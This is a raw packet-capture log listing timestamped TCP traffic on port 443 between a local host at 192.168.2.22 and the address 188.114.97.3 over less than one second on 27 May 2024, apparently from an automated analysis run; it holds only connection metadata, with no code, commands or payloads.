May 27, 2024 18:35:37.213598013 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.213620901 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.213658094 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.218740940 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.218806028 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.218810081 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.218832970 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.218863964 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.219300032 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.219355106 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.219369888 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.219402075 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.219432116 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.255897999 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.255961895 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.255990982 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.256004095 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.256021976 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.256021976 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.256185055 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.301785946 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.301856041 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.301870108 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.301924944 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.302329063 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.302387953 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.302400112 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.302453995 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.303097963 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.303150892 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.303164005 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.303220034 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.303970098 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.304022074 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.304034948 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.304064989 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.304083109 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.304882050 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.304938078 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.304956913 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.304986000 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.305358887 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.305569887 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.305622101 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.305634975 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.305690050 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.306477070 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.306551933 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.306564093 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.306586027 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.306619883 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.347419977 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.347486973 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.347496033 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.347524881 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.347570896 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.347579002 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.392658949 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.392739058 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.392740965 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.392776966 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.392798901 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.393187046 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.393244028 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.393259048 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.393300056 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.393313885 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.393316031 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.393358946 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.393831968 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.393873930 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.393883944 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.393898010 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.393927097 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.394551039 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.394606113 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.394614935 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.394639015 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.394686937 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.394695044 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.396014929 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.396043062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.396066904 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.396075010 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.396089077 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.396120071 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.396672964 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.396706104 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.396725893 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.396733999 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.396747112 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.396771908 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.397614956 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.397651911 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.397664070 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.397674084 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.397705078 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.437973022 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.438050985 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.438069105 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.438080072 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.438106060 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.438138008 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.483491898 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.483586073 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.483690977 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.483690977 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.483702898 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.483974934 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.484038115 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.484047890 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.484090090 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.484112978 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.484688044 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.484738111 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.484746933 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.484762907 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.484812021 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.484821081 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.485414982 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.485471010 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.485480070 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.485502958 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.485551119 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.485559940 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.486785889 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.486844063 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.486852884 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.486888885 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.486913919 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.487476110 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.487529039 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.487536907 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.487557888 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.487605095 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.487613916 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.488399029 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.488452911 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.488461971 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.488477945 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.488524914 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.488533020 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.529041052 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.529131889 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.529239893 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.529239893 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.529253006 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.574321032 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.574403048 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.574517965 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.574517965 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.574527979 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576260090 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576333046 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.576334953 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576368093 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576389074 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576392889 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.576427937 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.576786995 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576855898 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.576859951 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576884031 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.576914072 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.577579021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.577647924 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.577651024 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.577671051 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.577704906 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.578238010 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.578295946 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.578301907 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.578335047 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.578370094 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.578974009 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.579034090 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.579040051 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.579070091 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.579106092 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.579582930 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.579653978 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.579660892 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.579691887 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.579726934 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.620089054 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.620177984 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.620273113 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.620274067 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.620286942 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.665220976 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.665302038 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.665390015 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.665390015 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.665404081 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.665997028 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.666030884 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.666049957 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.666059017 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.666071892 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.666084051 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.666084051 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.666114092 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.666629076 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.666660070 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.666682959 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.666691065 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.666706085 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.666714907 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.667324066 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.667356968 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.667366028 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.667373896 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.667404890 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.668447971 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.668473959 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.668493986 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.668502092 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.668515921 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.668528080 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.669349909 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.669382095 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.669398069 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.669404984 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.669421911 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.669444084 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.670140982 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.670171022 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.670190096 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.670197010 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.670209885 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.670233965 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.712558985 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.712629080 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.712640047 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.712661028 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.712798119 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.760041952 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760104895 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760193110 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.760193110 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.760202885 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760615110 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760667086 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.760680914 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760706902 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760721922 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760732889 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.760761023 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.760895967 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760953903 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.760957956 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.760979891 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.761007071 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.762425900 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.762506008 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.762514114 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.762542009 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.762590885 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.762598991 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767355919 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767415047 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.767419100 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767448902 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767477036 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.767643929 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767709970 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.767718077 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767739058 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767785072 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.767791986 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767935038 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.767985106 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.767993927 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.768009901 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.768059969 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.768068075 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.802148104 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.802222967 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.802233934 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.802251101 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.802402973 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.802402973 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.849076986 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.849144936 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.849165916 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.849176884 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.849190950 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.850734949 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.850795031 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.850805998 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.850830078 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.850862026 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.852498055 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.852564096 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.852581024 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.852591038 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.852623940 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.855005026 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.855063915 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.855077982 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.855099916 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.855144978 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.855314970 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.855377913 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.855382919 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.855411053 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.855448961 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.856868029 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.856925964 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.856935024 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.856957912 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.856996059 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.859365940 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.859419107 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.859432936 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.859483004 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.892168045 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.892226934 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.892235994 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.892257929 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.892283916 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.940080881 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.940155983 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.940160990 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.940196991 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.940217972 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.940243959 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.941045046 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.941112041 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.941145897 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.941154957 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.941170931 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.941198111 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.942370892 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.942433119 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.942440033 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.942462921 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.942493916 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.944129944 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.944183111 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.944196939 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.944235086 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.944252968 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.945082903 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.945147991 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.945159912 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.945203066 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.945307970 CEST	49174	443	192.168.2.22	188.114.97.3
